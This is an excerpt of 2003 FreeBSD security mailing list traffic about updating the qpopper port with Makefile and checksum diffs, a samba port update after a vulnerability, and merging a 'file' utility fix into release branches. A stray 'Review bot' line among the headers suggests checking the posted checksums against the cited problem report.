(envelope-from mike@sentex.net) Received: from simian.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.12.8/8.12.8) with ESMTP id h2EJk28w098568; Fri, 14 Mar 2003 14:46:03 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030314145040.041dc3d8@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Fri, 14 Mar 2003 14:51:29 -0500 To: Brett Glass , security@FreeBSD.ORG 
From: Mike Tancsa Subject: Re: Patch to qpopper port files In-Reply-To: <4.3.2.7.2.20030314121038.02c9d630@localhost> References: <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (lava/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:11 PM 14/03/2003 -0700, Brett Glass wrote: >At 08:15 AM 3/13/2003, Mike Tancsa wrote: > > >The diffs below to the Makefile and distinfo seem to do the trick for > anyone wanting to grab an updated version before the port gets > committed. This works for me, YMMV. > >This doesn't seem to work on 4.7. What is the error that you get ? Did you update your ports tree first via cvsup, and then applied the patch ? ---Mike From owner-freebsd-security Fri Mar 14 11:57:51 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D89B337B401 for ; Fri, 14 Mar 2003 11:57:48 -0800 (PST) Received: from arthur.nitro.dk (port324.ds1-khk.adsl.cybercity.dk [212.242.113.79]) by mx1.FreeBSD.org (Postfix) with ESMTP id 425F943F85 for ; Fri, 14 Mar 2003 11:57:47 -0800 (PST) (envelope-from simon@arthur.nitro.dk) Received: by arthur.nitro.dk (Postfix, from userid 1000) id A72B010BF94; Fri, 14 Mar 2003 20:57:45 +0100 (CET) Date: Fri, 14 Mar 2003 20:57:45 +0100 
From: "Simon L. Nielsen" To: Mike Tancsa Cc: security@FreeBSD.ORG Subject: Re: Patch to qpopper port files Message-ID: <20030314195744.GB454@nitro.dk> References: <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="VS++wcV0S1rZb1Fb" Content-Disposition: inline In-Reply-To: <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> User-Agent: Mutt/1.5.3i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --VS++wcV0S1rZb1Fb Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On 2003.03.13 10:15:37 -0500, Mike Tancsa wrote: > The diffs below to the Makefile and distinfo seem to do the trick for=20 > anyone wanting to grab an updated version before the port gets=20 > committed. This works for me, YMMV. It looks like the distinfo change did not make it into your patch. That could perhaps cause problem Brett Glass is having? > --- Makefile.prev > +++ Makefile > @@ -6,7 +6,7 @@ > # >=20 > PORTNAME=3D qpopper > -PORTVERSION=3D 4.0.4 > +PORTVERSION=3D 4.0.5 > PORTREVISION=3D 1 > CATEGORIES=3D mail ipv6 > MASTER_SITES=3D ftp://ftp.qualcomm.com/eudora/servers/unix/popper/%SUBD= IR%/ 
> @@ -17,7 +17,7 @@ >=20 > .if ${OSVERSION} >=3D 400014 && !defined(WITHOUT_IPV6) > PATCH_SITES=3D http://www.imasy.or.jp/~ume/ipv6/ > -PATCHFILES=3D qpopper4.0.4-ipv6-20020502.diff.gz > +PATCHFILES=3D qpopper4.0.5-ipv6-20030313.diff.gz > PATCH_DIST_STRIP=3D -p1 > .endif --=20 Simon L. Nielsen --VS++wcV0S1rZb1Fb Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (FreeBSD) iD8DBQE+cjQ48kocFXgPTRwRAqtAAJ9nTqJNb3yXZ6N+cM/0954d0B/AsgCg1NPx bRI7wwJ4N624z/r3YM9S34s= =7czQ -----END PGP SIGNATURE----- --VS++wcV0S1rZb1Fb-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 14 12:26:11 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E82AA37B401 for ; Fri, 14 Mar 2003 12:26:07 -0800 (PST) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 146B343F75 for ; Fri, 14 Mar 2003 12:26:07 -0800 (PST) (envelope-from mike@sentex.net) Received: from simian.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.12.8/8.12.8) with ESMTP id h2EKQ68w098962; Fri, 14 Mar 2003 15:26:06 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030314153047.075d6598@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Fri, 14 Mar 2003 15:31:30 -0500 To: "Simon L. Nielsen" 
From: Mike Tancsa Subject: Re: Patch to qpopper port files Cc: security@FreeBSD.ORG In-Reply-To: <20030314195744.GB454@nitro.dk> References: <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (lava/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Strange, I thought I had sent that as well. Its in the PR anyways http://www.freebsd.org/cgi/query-pr.cgi?pr=ports/49988 --- distinfo.prev Thu Mar 13 09:55:26 2003 +++ distinfo Thu Mar 13 09:58:46 2003 @@ -1,2 +1,2 @@ -MD5 (qpopper4.0.4.tar.gz) = 77f0968cd10b0d5236114838d9f507e5 -MD5 (qpopper4.0.4-ipv6-20020502.diff.gz) = 62f6b065a040e3fbc31a720746b9efae +MD5 (qpopper4.0.5.tar.gz) = e00853280c9e899711f0b0239d3d8f86 +MD5 (qpopper4.0.5-ipv6-20030313.diff.gz) = 1d4b68ab55b95fb1d12528c505f24e5a At 08:57 PM 14/03/2003 +0100, Simon L. Nielsen wrote: >On 2003.03.13 10:15:37 -0500, Mike Tancsa wrote: > > > The diffs below to the Makefile and distinfo seem to do the trick for > > anyone wanting to grab an updated version before the port gets > > committed. This works for me, YMMV. >It looks like the distinfo change did not make it into your patch. >That could perhaps cause problem Brett Glass is having? > > > --- Makefile.prev > > +++ Makefile > > @@ -6,7 +6,7 @@ > > # > > > > PORTNAME= qpopper > > -PORTVERSION= 4.0.4 > > +PORTVERSION= 4.0.5 > > PORTREVISION= 1 > > CATEGORIES= mail ipv6 > > MASTER_SITES= ftp://ftp.qualcomm.com/eudora/servers/unix/popper/%SUBDIR%/ 
> > @@ -17,7 +17,7 @@ > > > > .if ${OSVERSION} >= 400014 && !defined(WITHOUT_IPV6) > > PATCH_SITES= http://www.imasy.or.jp/~ume/ipv6/ > > -PATCHFILES= qpopper4.0.4-ipv6-20020502.diff.gz > > +PATCHFILES= qpopper4.0.5-ipv6-20030313.diff.gz > > PATCH_DIST_STRIP= -p1 > > .endif > >-- >Simon L. Nielsen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Mar 15 13: 5:11 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B902D37B401; Sat, 15 Mar 2003 13:05:08 -0800 (PST) Received: from imul.math.uni.lodz.pl (imul.math.uni.lodz.pl [212.191.65.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1008F43F3F; Sat, 15 Mar 2003 13:05:07 -0800 (PST) (envelope-from mg@fork.pl) Received: from fork.pl (imul.math.uni.lodz.pl [212.191.65.2]) by imul.math.uni.lodz.pl (Mail Transport Agent) with ESMTP id E82731F0A; Sat, 15 Mar 2003 22:03:56 +0100 (CET) Message-ID: <3E73958A.7000605@fork.pl> Date: Sat, 15 Mar 2003 22:05:14 +0100 
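Review bot: the two added MD5 lines in the @@ -1,2 +1,2 @@ distinfo hunk posted by Mike Tancsa arrive in the same plain-text list mail as the advice to use them, so on their own they only show that a download matches what the poster had. Suggest comparing them with the distinfo in the PR the mail cites (ports/49988), or with the port once it is committed, before building from qpopper4.0.5.tar.gz and qpopper4.0.5-ipv6-20030313.diff.gz.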
From: Marcin Gryszkalis Organization: fork.pl User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312 X-Accept-Language: en-us, en, pl MIME-Version: 1.0 To: security at FreeBSD Cc: trevor@FreeBSD.org Subject: samba vulnerability Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi The samba team announced a vulnerability in 2.2.7 and released 2.2.8 Full advisory at http://us1.samba.org/samba/whatsnew/samba-2.2.8.html There's an update of ports/net/samba made on 03/15 http://www.freebsd.org/cgi/getmsg.cgi?fetch=167866+0+current/cvs-ports But I cannot fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/samba-2.2.7a-vs-2.2-20030314.diff.bz2 (the file doesn't exist) I guess it just didn't get mirrored, but - what is the *main* distfiles ftp server? 
The makefile is # $FreeBSD: ports/net/samba/Makefile,v 1.115 2003/03/15 10:47:12 trevor Exp $ -- Marcin Gryszkalis http://fork.pl <>< From owner-freebsd-security Sat Mar 15 13:22:41 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 387AD37B401; Sat, 15 Mar 2003 13:22:38 -0800 (PST) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 337F043F3F; Sat, 15 Mar 2003 13:22:37 -0800 (PST) (envelope-from mike@sentex.net) Received: from simian.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.12.8/8.12.8) with ESMTP id h2FLMZrj001909; Sat, 15 Mar 2003 16:22:36 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030315162616.04f4e730@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Sat, 15 Mar 2003 16:27:37 -0500 To: freebsd-security@FreeBSD.ORG 
From: Mike Tancsa Subject: Re: MFC of file security fix ? (was Re: Prov. patch for the file hole ISS disclosed) In-Reply-To: <5.2.0.9.0.20030313074828.07290af0@192.168.0.12> References: <20030311181452.GA59655@dragon.nuxi.com> <20030311174126.GA57179@madman.celabo.org> <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> <5.2.0.9.2.20030311113159.0386fea0@localhost> <20030311174126.GA57179@madman.celabo.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (lava/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Just wondering if any decision has been made on this either way ? ---Mike At 07:49 AM 13/03/2003 -0500, Mike Tancsa wrote: >Hi, > Is there still a plan to MFC this to RELENG_4 ? > >At 10:14 AM 3/11/2003 -0800, David O'Brien wrote: >>On Tue, Mar 11, 2003 at 11:41:27AM -0600, Jacques A. Vidrine wrote: >> > On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote: >> > > At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote: >> > > >Thanks! However, this has already been fixed in -CURRENT (by import >> > > >of FILE 3.41). I do not know whether or not David plans to MFC in >> > > >time for 4.8-RELEASE. >> > > >> > > I think this should be merged into the security branches, >> > > due to possible remote exploit by third party programs that >> > > use file, such as (at the very least) amavis. >> > >> > I tend to agree. >> > >> > David? >> >>Up to you. I'm going to do an MFC for 4.8. I am not very well setup to >>test the security branches. Do you want me to just MFC exactly what I >>committed to 5-CURRENT to the 5_0 branch (it should Just Work). Same for >>the 4_7 branch. 
>> > >-------------------------------------------------------------------- >Mike Tancsa, tel +1 519 651 3400 >Sentex Communications, mike@sentex.net >Providing Internet since 1994 www.sentex.net >Cambridge, Ontario Canada www.sentex.net/mike